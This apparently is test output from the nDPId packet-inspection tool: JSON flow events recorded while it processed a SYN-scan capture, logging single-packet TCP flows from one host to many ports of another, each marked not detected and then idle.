+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 